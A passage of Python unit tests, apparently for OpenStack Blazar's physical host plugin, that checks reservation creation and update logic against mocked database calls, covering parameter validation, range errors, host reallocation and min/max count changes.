'host_allocation_create')
self.fake_phys_plugin.reserve_resource(
u'441c1476-9f8f-4700-9f30-cd9b6fef3509',
values)
host_values = {
'reservation_id': u'441c1476-9f8f-4700-9f30-cd9b6fef3509',
'aggregate_id': 1,
'resource_properties': '',
'hypervisor_properties': '["=", "$memory_mb", "256"]',
'count_range': '1-1',
'status': 'pending',
'before_end': 'default'
}
host_reservation_create.assert_called_once_with(host_values)
calls = [
mock.call(
{'compute_host_id': 'host1',
'reservation_id': u'441c1476-9f8f-4700-9f30-cd9b6fef3509',
}),
mock.call(
{'compute_host_id': 'host2',
'reservation_id': u'441c1476-9f8f-4700-9f30-cd9b6fef3509',
}),
]
host_allocation_create.assert_has_calls(calls)
@ddt.data("min", "max", "hypervisor_properties", "resource_properties")
def test_create_reservation_with_missing_param(self, missing_param):
values = {
'lease_id': u'018c1b43-e69e-4aef-a543-09681539cf4c',
'min': 1,
'max': 2,
'before_end': 'default',
'hypervisor_properties': '["=", "$memory_mb", "256"]',
'resource_properties': '',
'start_date': datetime.datetime(2017, 3, 1, 20, 00),
'end_date': datetime.datetime(2017, 3, 2, 20, 00),
'resource_type': plugin.RESOURCE_TYPE}
del values[missing_param]
self.assertRaises(
manager_exceptions.MissingParameter,
self.fake_phys_plugin.reserve_resource,
u'441c1476-9f8f-4700-9f30-cd9b6fef3509',
values)
@ddt.data({"params": {'max': 0}},
{"params": {'max': -1}},
{"params": {'max': 'one'}},
{"params": {'min': 0}},
{"params": {'min': -1}},
{"params": {'min': 'one'}},
{"params": {'before_end': 'invalid'}})
@ddt.unpack
def test_create_reservation_with_invalid_param(self, params):
values = {
'lease_id': u'018c1b43-e69e-4aef-a543-09681539cf4c',
'min': 1,
'max': 2,
'before_end': 'default',
'hypervisor_properties': '["=", "$memory_mb", "256"]',
'resource_properties': '',
'start_date': datetime.datetime(2017, 3, 1, 20, 00),
'end_date': datetime.datetime(2017, 3, 2, 20, 00),
'resource_type': plugin.RESOURCE_TYPE}
for key, value in params.items():
values[key] = value
self.assertRaises(
manager_exceptions.MalformedParameter,
self.fake_phys_plugin.reserve_resource,
u'441c1476-9f8f-4700-9f30-cd9b6fef3509',
values)
@ddt.data({"params": {'max': 0}},
{"params": {'max': -1}},
{"params": {'max': 'one'}},
{"params": {'min': 0}},
{"params": {'min': -1}},
{"params": {'min': 'one'}})
@ddt.unpack
def test_update_reservation_with_invalid_param(self, params):
values = {
'lease_id': u'018c1b43-e69e-4aef-a543-09681539cf4c',
'min': 1,
'max': 2,
'before_end': 'default',
'hypervisor_properties': '["=", "$memory_mb", "256"]',
'resource_properties': '',
'start_date': datetime.datetime(2017, 3, 1, 20, 00),
'end_date': datetime.datetime(2017, 3, 2, 20, 00),
'resource_type': plugin.RESOURCE_TYPE}
self.patch(self.db_api, 'reservation_get')
self.patch(self.db_api, 'lease_get')
host_reservation_get = self.patch(self.db_api,
'host_reservation_get')
host_reservation_get.return_value = {
'count_range': '1-1',
'hypervisor_properties': '["=", "$memory_mb", "256"]',
'resource_properties': ''
}
for key, value in params.items():
values[key] = value
self.assertRaises(
manager_exceptions.MalformedParameter,
self.fake_phys_plugin.update_reservation,
u'441c1476-9f8f-4700-9f30-cd9b6fef3509',
values)
def test_create_update_reservation_with_invalid_range(self):
values = {
'lease_id': u'018c1b43-e69e-4aef-a543-09681539cf4c',
'min': 2,
'max': 1,
'hypervisor_properties': '["=", "$memory_mb", "256"]',
'resource_properties': '',
'start_date': datetime.datetime(2017, 3, 1, 20, 00),
'end_date': datetime.datetime(2017, 3, 2, 20, 00),
'resource_type': plugin.RESOURCE_TYPE,
}
self.patch(self.db_api, 'reservation_get')
self.patch(self.db_api, 'lease_get')
host_reservation_get = self.patch(self.db_api,
'host_reservation_get')
host_reservation_get.return_value = {
'count_range': '1-1',
'hypervisor_properties': '["=", "$memory_mb", "256"]',
'resource_properties': ''
}
self.assertRaises(
manager_exceptions.InvalidRange,
self.fake_phys_plugin.reserve_resource,
u'441c1476-9f8f-4700-9f30-cd9b6fef3509',
values)
self.assertRaises(
manager_exceptions.InvalidRange,
self.fake_phys_plugin.update_reservation,
u'441c1476-9f8f-4700-9f30-cd9b6fef3509',
values)
def test_update_reservation_shorten(self):
values = {
'start_date': datetime.datetime(2013, 12, 19, 20, 30),
'end_date': datetime.datetime(2013, 12, 19, 21, 00)
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = {
'lease_id': u'10870923-6d56-45c9-b592-f788053f5baa',
}
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = {
'start_date': datetime.datetime(2013, 12, 19, 20, 00),
'end_date': datetime.datetime(2013, 12, 19, 21, 00)
}
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
self.fake_phys_plugin.update_reservation(
'706eb3bc-07ed-4383-be93-b32845ece672',
values)
host_reservation_get.assert_not_called()
def test_update_reservation_extend(self):
values = {
'start_date': datetime.datetime(2013, 12, 19, 20, 00),
'end_date': datetime.datetime(2013, 12, 19, 21, 30)
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = {
'lease_id': u'10870923-6d56-45c9-b592-f788053f5baa',
'resource_id': u'91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'status': 'pending'
}
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = {
'start_date': datetime.datetime(2013, 12, 19, 20, 00),
'end_date': datetime.datetime(2013, 12, 19, 21, 00)
}
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = {
'count_range': '1-1',
'hypervisor_properties': '["=", "$memory_mb", "256"]',
'resource_properties': ''
}
host_allocation_get_all = self.patch(
self.db_api,
'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = [
{
'id': u'dd305477-4df8-4547-87f6-69069ee546a6',
'compute_host_id': 'host1'
}
]
host_get_all_by_queries = self.patch(self.db_api,
'host_get_all_by_queries')
host_get_all_by_queries.return_value = [{'id': 'host1'}]
get_reserved_periods = self.patch(self.db_utils,
'get_reserved_periods')
get_reserved_periods.return_value = [
(datetime.datetime(2013, 12, 19, 20, 00),
datetime.datetime(2013, 12, 19, 21, 00))
]
host_allocation_create = self.patch(
self.db_api,
'host_allocation_create')
host_allocation_destroy = self.patch(
self.db_api,
'host_allocation_destroy')
self.fake_phys_plugin.update_reservation(
'706eb3bc-07ed-4383-be93-b32845ece672',
values)
host_allocation_create.assert_not_called()
host_allocation_destroy.assert_not_called()
def test_update_reservation_move_failure(self):
values = {
'start_date': datetime.datetime(2013, 12, 20, 20, 00),
'end_date': datetime.datetime(2013, 12, 20, 21, 30)
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = {
'lease_id': u'10870923-6d56-45c9-b592-f788053f5baa',
'resource_id': u'91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'status': 'active'
}
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = {
'start_date': datetime.datetime(2013, 12, 19, 20, 00),
'end_date': datetime.datetime(2013, 12, 19, 21, 00)
}
host_reservation_get = self.patch(
self.db_api,
'host_reservation_get')
host_reservation_get.return_value = {
'count_range': '1-1',
'hypervisor_properties': '["=", "$memory_mb", "256"]',
'resource_properties': ''
}
host_allocation_get_all = self.patch(
self.db_api,
'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = [
{
'id': u'dd305477-4df8-4547-87f6-69069ee546a6',
'compute_host_id': 'host1'
}
]
host_get_all_by_queries = self.patch(self.db_api,
'host_get_all_by_queries')
host_get_all_by_queries.return_value = [{'id': 'host1'}]
get_reserved_periods = self.patch(self.db_utils,
'get_reserved_periods')
get_reserved_periods.return_value = [
(datetime.datetime(2013, 12, 20, 20, 30),
datetime.datetime(2013, 12, 20, 21, 00))
]
get_computehosts = self.patch(self.nova.ReservationPool,
'get_computehosts')
get_computehosts.return_value = ['host1']
matching_hosts = self.patch(self.fake_phys_plugin, '_matching_hosts')
matching_hosts.return_value = []
self.assertRaises(
manager_exceptions.NotEnoughHostsAvailable,
self.fake_phys_plugin.update_reservation,
'706eb3bc-07ed-4383-be93-b32845ece672',
values)
reservation_get.assert_called()
def test_update_reservation_move_overlap(self):
values = {
'start_date': datetime.datetime(2013, 12, 19, 20, 30),
'end_date': datetime.datetime(2013, 12, 19, 21, 30)
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = {
'lease_id': u'10870923-6d56-45c9-b592-f788053f5baa',
'resource_id': u'91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'status': 'pending'
}
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = {
'start_date': datetime.datetime(2013, 12, 19, 20, 00),
'end_date': datetime.datetime(2013, 12, 19, 21, 00)
}
host_reservation_get = self.patch(
self.db_api,
'host_reservation_get')
host_reservation_get.return_value = {
'count_range': '1-1',
'hypervisor_properties': '["=", "$memory_mb", "256"]',
'resource_properties': ''
}
host_allocation_get_all = self.patch(
self.db_api,
'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = [
{
'id': u'dd305477-4df8-4547-87f6-69069ee546a6',
'compute_host_id': 'host1'
}
]
host_get_all_by_queries = self.patch(self.db_api,
'host_get_all_by_queries')
host_get_all_by_queries.return_value = [{'id': 'host1'}]
get_reserved_periods = self.patch(self.db_utils,
'get_reserved_periods')
get_reserved_periods.return_value = [
(datetime.datetime(2013, 12, 19, 20, 30),
datetime.datetime(2013, 12, 19, 21, 00))
]
host_allocation_create = self.patch(
self.db_api,
'host_allocation_create')
host_allocation_destroy = self.patch(
self.db_api,
'host_allocation_destroy')
self.fake_phys_plugin.update_reservation(
'706eb3bc-07ed-4383-be93-b32845ece672',
values)
host_allocation_create.assert_not_called()
host_allocation_destroy.assert_not_called()
def test_update_reservation_move_realloc(self):
values = {
'start_date': datetime.datetime(2013, 12, 20, 20, 00),
'end_date': datetime.datetime(2013, 12, 20, 21, 30)
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = {
'lease_id': u'10870923-6d56-45c9-b592-f788053f5baa',
'resource_id': u'91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'status': 'pending'
}
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = {
'start_date': datetime.datetime(2013, 12, 19, 20, 00),
'end_date': datetime.datetime(2013, 12, 19, 21, 00)
}
host_reservation_get = self.patch(
self.db_api,
'host_reservation_get')
host_reservation_get.return_value = {
'aggregate_id': 1,
'count_range': '1-1',
'hypervisor_properties': '["=", "$memory_mb", "256"]',
'resource_properties': ''
}
host_allocation_get_all = self.patch(
self.db_api,
'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = [
{
'id': u'dd305477-4df8-4547-87f6-69069ee546a6',
'compute_host_id': 'host1'
}
]
host_get_all_by_queries = self.patch(self.db_api,
'host_get_all_by_queries')
host_get_all_by_queries.return_value = [{'id': 'host1'},
{'id': 'host2'}]
host_allocation_create = self.patch(
self.db_api,
'host_allocation_create')
host_allocation_destroy = self.patch(
self.db_api,
'host_allocation_destroy')
get_reserved_periods = self.patch(self.db_utils,
'get_reserved_periods')
get_reserved_periods.return_value = [
(datetime.datetime(2013, 12, 20, 20, 30),
datetime.datetime(2013, 12, 20, 21, 00))
]
matching_hosts = self.patch(self.fake_phys_plugin, '_matching_hosts')
matching_hosts.return_value = ['host2']
self.fake_phys_plugin.update_reservation(
'706eb3bc-07ed-4383-be93-b32845ece672',
values)
host_reservation_get.assert_called_with(
u'91253650-cc34-4c4f-bbe8-c943aa7d0c9b')
host_allocation_destroy.assert_called_with(
'dd305477-4df8-4547-87f6-69069ee546a6')
host_allocation_create.assert_called_with(
{
'compute_host_id': 'host2',
'reservation_id': '706eb3bc-07ed-4383-be93-b32845ece672'
}
)
def test_update_reservation_min_increase_success(self):
values = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00),
'min': 3
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = {
'lease_id': '10870923-6d56-45c9-b592-f788053f5baa',
'resource_id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'status': 'pending'
}
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00)
}
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = {
'id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'count_range': '2-3',
'hypervisor_properties': '["=", "$memory_mb", "16384"]',
'resource_properties': ''
}
host_allocation_get_all = self.patch(
self.db_api, 'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = [
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a6',
'compute_host_id': 'host1'
},
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a7',
'compute_host_id': 'host2'
}
]
host_get_all_by_queries = self.patch(self.db_api,
'host_get_all_by_queries')
host_get_all_by_queries.return_value = [
{'id': 'host1'},
{'id': 'host2'},
{'id': 'host3'}
]
host_allocation_destroy = self.patch(self.db_api,
'host_allocation_destroy')
host_allocation_create = self.patch(self.db_api,
'host_allocation_create')
matching_hosts = self.patch(self.fake_phys_plugin, '_matching_hosts')
matching_hosts.return_value = ['host3']
host_reservation_update = self.patch(self.db_api,
'host_reservation_update')
self.fake_phys_plugin.update_reservation(
'706eb3bc-07ed-4383-be93-b32845ece672',
values)
host_reservation_get.assert_called_with(
'91253650-cc34-4c4f-bbe8-c943aa7d0c9b')
matching_hosts.assert_called_with(
'["=", "$memory_mb", "16384"]',
'',
'1-1',
datetime.datetime(2017, 7, 12, 20, 00),
datetime.datetime(2017, 7, 12, 21, 00)
)
host_allocation_destroy.assert_not_called()
host_allocation_create.assert_called_with(
{
'compute_host_id': 'host3',
'reservation_id': '706eb3bc-07ed-4383-be93-b32845ece672'
}
)
host_reservation_update.assert_called_with(
'91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
{'count_range': '3-3'}
)
def test_update_reservation_min_increase_fail(self):
values = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00),
'min': 3
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = {
'lease_id': '10870923-6d56-45c9-b592-f788053f5baa',
'resource_id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'status': 'pending'
}
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00)
}
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = {
'id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'count_range': '2-3',
'hypervisor_properties': '["=", "$memory_mb", "16384"]',
'resource_properties': ''
}
host_allocation_get_all = self.patch(
self.db_api, 'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = [
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a6',
'compute_host_id': 'host1'
},
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a7',
'compute_host_id': 'host2'
}
]
host_get_all_by_queries = self.patch(self.db_api,
'host_get_all_by_queries')
host_get_all_by_queries.return_value = [
{'id': 'host1'},
{'id': 'host2'}
]
matching_hosts = self.patch(self.fake_phys_plugin, '_matching_hosts')
matching_hosts.return_value = []
self.assertRaises(
manager_exceptions.NotEnoughHostsAvailable,
self.fake_phys_plugin.update_reservation,
'706eb3bc-07ed-4383-be93-b32845ece672',
values)
matching_hosts.assert_called_with(
'["=", "$memory_mb", "16384"]',
'',
'1-1',
datetime.datetime(2017, 7, 12, 20, 00),
datetime.datetime(2017, 7, 12, 21, 00)
)
def test_update_reservation_min_decrease(self):
values = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00),
'min': 1
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = {
'lease_id': '10870923-6d56-45c9-b592-f788053f5baa',
'resource_id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'status': 'pending'
}
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00)
}
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = {
'id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'count_range': '2-2',
'hypervisor_properties': '["=", "$memory_mb", "16384"]',
'resource_properties': ''
}
host_allocation_get_all = self.patch(
self.db_api, 'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = [
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a6',
'compute_host_id': 'host1'
},
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a7',
'compute_host_id': 'host2'
}
]
host_get_all_by_queries = self.patch(self.db_api,
'host_get_all_by_queries')
host_get_all_by_queries.return_value = [
{'id': 'host1'},
{'id': 'host2'}
]
matching_hosts = self.patch(self.fake_phys_plugin, '_matching_hosts')
host_allocation_destroy = self.patch(self.db_api,
'host_allocation_destroy')
host_allocation_create = self.patch(self.db_api,
'host_allocation_create')
host_reservation_update = self.patch(self.db_api,
'host_reservation_update')
self.fake_phys_plugin.update_reservation(
'706eb3bc-07ed-4383-be93-b32845ece672',
values)
matching_hosts.assert_not_called()
host_allocation_destroy.assert_not_called()
host_allocation_create.assert_not_called()
host_reservation_update.assert_called_with(
'91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
{'count_range': '1-2'}
)
def test_update_reservation_max_increase_alloc(self):
values = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00),
'max': 3
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = {
'lease_id': '10870923-6d56-45c9-b592-f788053f5baa',
'resource_id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'status': 'pending'
}
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00)
}
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = {
'id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'count_range': '1-2',
'hypervisor_properties': '["=", "$memory_mb", "16384"]',
'resource_properties': ''
}
host_allocation_get_all = self.patch(
self.db_api, 'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = [
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a6',
'compute_host_id': 'host1'
},
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a7',
'compute_host_id': 'host2'
}
]
host_get_all_by_queries = self.patch(self.db_api,
'host_get_all_by_queries')
host_get_all_by_queries.return_value = [
{'id': 'host1'},
{'id': 'host2'},
{'id': 'host3'}
]
host_allocation_destroy = self.patch(self.db_api,
'host_allocation_destroy')
host_allocation_create = self.patch(self.db_api,
'host_allocation_create')
matching_hosts = self.patch(self.fake_phys_plugin, '_matching_hosts')
matching_hosts.return_value = ['host3']
host_reservation_update = self.patch(self.db_api,
'host_reservation_update')
self.fake_phys_plugin.update_reservation(
'706eb3bc-07ed-4383-be93-b32845ece672',
values)
host_reservation_get.assert_called_with(
'91253650-cc34-4c4f-bbe8-c943aa7d0c9b')
matching_hosts.assert_called_with(
'["=", "$memory_mb", "16384"]',
'',
'0-1',
datetime.datetime(2017, 7, 12, 20, 00),
datetime.datetime(2017, 7, 12, 21, 00)
)
host_allocation_destroy.assert_not_called()
host_allocation_create.assert_called_with(
{
'compute_host_id': 'host3',
'reservation_id': '706eb3bc-07ed-4383-be93-b32845ece672'
}
)
host_reservation_update.assert_called_with(
'91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
{'count_range': '1-3'}
)
def test_update_active_reservation_max_increase_alloc(self):
values = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00),
'max': 3
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = {
'lease_id': '10870923-6d56-45c9-b592-f788053f5baa',
'resource_id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'status': 'active'
}
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00)
}
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = {
'id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'count_range': '1-2',
'hypervisor_properties': '["=", "$memory_mb", "16384"]',
'resource_properties': '',
'reservation_id': u'706eb3bc-07ed-4383-be93-b32845ece672',
'aggregate_id': 1,
}
host_allocation_get_all = self.patch(
self.db_api, 'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = [
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a6',
'compute_host_id': 'host1'
},
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a7',
'compute_host_id': 'host2'
}
]
host_get_all_by_queries = self.patch(self.db_api,
'host_get_all_by_queries')
host_get_all_by_queries.return_value = [
{'id': 'host1'},
{'id': 'host2'},
{'id': 'host3'}
]
host_allocation_destroy = self.patch(self.db_api,
'host_allocation_destroy')
host_allocation_create = self.patch(self.db_api,
'host_allocation_create')
matching_hosts = self.patch(self.fake_phys_plugin, '_matching_hosts')
matching_hosts.return_value = ['host3']
host_get = self.patch(self.db_api, 'host_get')
host_get.return_value = {'service_name': 'host3_hostname'}
add_computehost = self.patch(
self.nova.ReservationPool, 'add_computehost')
host_reservation_update = self.patch(self.db_api,
'host_reservation_update')
self.fake_phys_plugin.update_reservation(
'706eb3bc-07ed-4383-be93-b32845ece672',
values)
host_reservation_get.assert_called_with(
'91253650-cc34-4c4f-bbe8-c943aa7d0c9b')
matching_hosts.assert_called_with(
'["=", "$memory_mb", "16384"]',
'',
'0-1',
datetime.datetime(2017, 7, 12, 20, 00),
datetime.datetime(2017, 7, 12, 21, 00)
)
host_allocation_destroy.assert_not_called()
host_allocation_create.assert_called_with(
{
'compute_host_id': 'host3',
'reservation_id': '706eb3bc-07ed-4383-be93-b32845ece672'
}
)
add_computehost.assert_called_with(1, ['host3_hostname'])
host_reservation_update.assert_called_with(
'91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
{'count_range': '1-3'}
)
def test_update_reservation_max_increase_noalloc(self):
values = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00),
'max': 3
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = {
'lease_id': '10870923-6d56-45c9-b592-f788053f5baa',
'resource_id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'status': 'pending'
}
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00)
}
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = {
'id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'count_range': '1-2',
'hypervisor_properties': '["=", "$memory_mb", "16384"]',
'resource_properties': ''
}
host_allocation_get_all = self.patch(
self.db_api, 'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = [
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a6',
'compute_host_id': 'host1'
},
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a7',
'compute_host_id': 'host2'
}
]
host_get_all_by_queries = self.patch(self.db_api,
'host_get_all_by_queries')
host_get_all_by_queries.return_value = [
{'id': 'host1'},
{'id': 'host2'}
]
matching_hosts = self.patch(self.fake_phys_plugin, '_matching_hosts')
matching_hosts.return_value = []
host_reservation_update = self.patch(self.db_api,
'host_reservation_update')
self.fake_phys_plugin.update_reservation(
'706eb3bc-07ed-4383-be93-b32845ece672',
values)
host_reservation_get.assert_called_with(
'91253650-cc34-4c4f-bbe8-c943aa7d0c9b')
matching_hosts.assert_called_with(
'["=", "$memory_mb", "16384"]',
'',
'0-1',
datetime.datetime(2017, 7, 12, 20, 00),
datetime.datetime(2017, 7, 12, 21, 00)
)
host_reservation_update.assert_called_with(
'91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
{'count_range': '1-3'}
)
def test_update_reservation_max_decrease(self):
values = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00),
'max': 1
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = {
'lease_id': '10870923-6d56-45c9-b592-f788053f5baa',
'resource_id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'status': 'pending'
}
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00)
}
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = {
'id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'count_range': '1-2',
'hypervisor_properties': '["=", "$memory_mb", "16384"]',
'resource_properties': ''
}
host_allocation_get_all = self.patch(
self.db_api, 'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = [
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a6',
'compute_host_id': 'host1'
},
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a7',
'compute_host_id': 'host2'
}
]
host_get_all_by_queries = self.patch(self.db_api,
'host_get_all_by_queries')
host_get_all_by_queries.return_value = [
{'id': 'host1'},
{'id': 'host2'}
]
host_allocation_destroy = self.patch(self.db_api,
'host_allocation_destroy')
host_reservation_update = self.patch(self.db_api,
'host_reservation_update')
self.fake_phys_plugin.update_reservation(
'706eb3bc-07ed-4383-be93-b32845ece672',
values)
host_reservation_get.assert_called_with(
'91253650-cc34-4c4f-bbe8-c943aa7d0c9b')
host_allocation_destroy.assert_called_with(
'dd305477-4df8-4547-87f6-69069ee546a6')
host_reservation_update.assert_called_with(
'91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
{'count_range': '1-1'}
)
def test_update_reservation_realloc_with_properties_change(self):
values = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00),
'hypervisor_properties': '["=", "$memory_mb", "32768"]',
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = {
'lease_id': '10870923-6d56-45c9-b592-f788053f5baa',
'resource_id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'status': 'pending'
}
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00)
}
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = {
'id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'count_range': '1-1',
'hypervisor_properties': '["=", "$memory_mb", "16384"]',
'resource_properties': ''
}
host_allocation_get_all = self.patch(
self.db_api, 'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = [
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a6',
'compute_host_id': 'host1'
}
]
host_get_all_by_queries = self.patch(self.db_api,
'host_get_all_by_queries')
host_get_all_by_queries.return_value = [{'id': 'host2'}]
matching_hosts = self.patch(self.fake_phys_plugin, '_matching_hosts')
matching_hosts.return_value = ['host2']
host_allocation_create = self.patch(self.db_api,
'host_allocation_create')
host_allocation_destroy = self.patch(self.db_api,
'host_allocation_destroy')
host_reservation_update = self.patch(self.db_api,
'host_reservation_update')
self.fake_phys_plugin.update_reservation(
'706eb3bc-07ed-4383-be93-b32845ece672',
values)
host_reservation_get.assert_called_with(
'91253650-cc34-4c4f-bbe8-c943aa7d0c9b')
matching_hosts.assert_called_with(
'["=", "$memory_mb", "32768"]',
'',
'1-1',
datetime.datetime(2017, 7, 12, 20, 00),
datetime.datetime(2017, 7, 12, 21, 00)
)
host_allocation_create.assert_called_with(
{
'compute_host_id': 'host2',
'reservation_id': '706eb3bc-07ed-4383-be93-b32845ece672'
}
)
host_allocation_destroy.assert_called_with(
'dd305477-4df8-4547-87f6-69069ee546a6'
)
host_reservation_update.assert_called_with(
'91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
{'hypervisor_properties': '["=", "$memory_mb", "32768"]'}
)
def test_update_reservation_no_requested_hosts_available(self):
values = {
'start_date': datetime.datetime(2017, 7, 12, 20, 00),
'end_date': datetime.datetime(2017, 7, 12, 21, 00),
'resource_properties': '[">=", "$vcpus", "32768"]'
}
reservation_get = self.patch(self.db_api, 'reservation_get')
reservation_get.return_value = {
'lease_id': '10870923-6d56-45c9-b592-f788053f5baa',
'resource_id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'status': 'pending'
}
lease_get = self.patch(self.db_api, 'lease_get')
lease_get.return_value = {
'start_date': datetime.datetime(2013, 12, 19, 20, 00),
'end_date': datetime.datetime(2013, 12, 19, 21, 00)
}
host_reservation_get = self.patch(self.db_api, 'host_reservation_get')
host_reservation_get.return_value = {
'id': '91253650-cc34-4c4f-bbe8-c943aa7d0c9b',
'count_range': '1-1',
'hypervisor_properties': '["=", "$memory_mb", "16384"]',
'resource_properties': ''
}
host_allocation_get_all = self.patch(
self.db_api, 'host_allocation_get_all_by_values')
host_allocation_get_all.return_value = [
{
'id': 'dd305477-4df8-4547-87f6-69069ee546a6',
'compute_host_id': 'host1'
}
]
